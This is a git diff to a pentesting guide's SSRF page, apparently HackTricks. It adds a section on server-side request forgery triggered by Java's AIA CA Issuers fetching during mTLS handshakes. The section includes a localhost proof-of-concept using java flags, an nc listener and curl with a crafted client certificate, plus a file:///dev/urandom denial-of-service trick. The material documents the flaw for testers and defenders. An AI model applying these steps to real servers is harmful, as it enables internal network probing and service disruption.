diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
index 3e75402e8b5..0c8ad779296 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -142,6 +142,23 @@ In this configuration, the value from the Server Name Indication (SNI) field is
 openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
 ```
 
+## SSRF via TLS AIA CA Issuers (Java mTLS)
+
+Some TLS stacks will auto-download missing intermediate CAs using the **Authority Information Access (AIA) → CA Issuers** URI inside the peer certificate. In **Java**, enabling `-Dcom.sun.security.enableAIAcaIssuers=true` while running an mTLS service makes the server dereference attacker-controlled URIs from the client certificate **during the handshake**, before any HTTP logic runs.
+
+- **Requirements**: mTLS enabled, Java AIA fetching enabled, attacker can present a client cert with a crafted AIA CA Issuers URI.
+- **Triggering SSRF** (Java 21 example):
+  ```bash
+  java -Djava.security.debug=certpath \
+       -Dcom.sun.security.enableAIAcaIssuers=true \
+       -Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
+  # Attacker cert AIA: http://localhost:8080
+  nc -l 8080 -k                      # observe the outbound fetch
+  curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem
+  ```
+  The Java certpath debug output shows `CertStore URI:http://localhost:8080`, and `nc` captures the HTTP request with the controllable `User-Agent` from `-Dhttp.agent`, proving SSRF during certificate validation.
+- **DoS via file://**: setting AIA CA Issuers to `file:///dev/urandom` on Unix-like hosts makes Java treat it as a CertStore and read unbounded random bytes, keeping a CPU core busy and blocking subsequent connections even after the client disconnects.
+
 ## [Wget file upload](../file-upload/index.html#wget-file-upload-ssrf-trick)
 
 ## SSRF with Command Injection
@@ -441,5 +458,7 @@ https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
 - [https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/](https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/)
 - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
 - [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
+- [Tenable – SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk](https://www.tenable.com/blog/tenable-discovers-ssrf-vulnerability-in-java-tls-handshakes-that-creates-dos-risk)
+- [RFC 5280 §4.2.2.1 Authority Information Access](https://datatracker.ietf.org/doc/html/rfc5280#section-4.2.2.1)
 
 {{#include ../../banners/hacktricks-training.md}}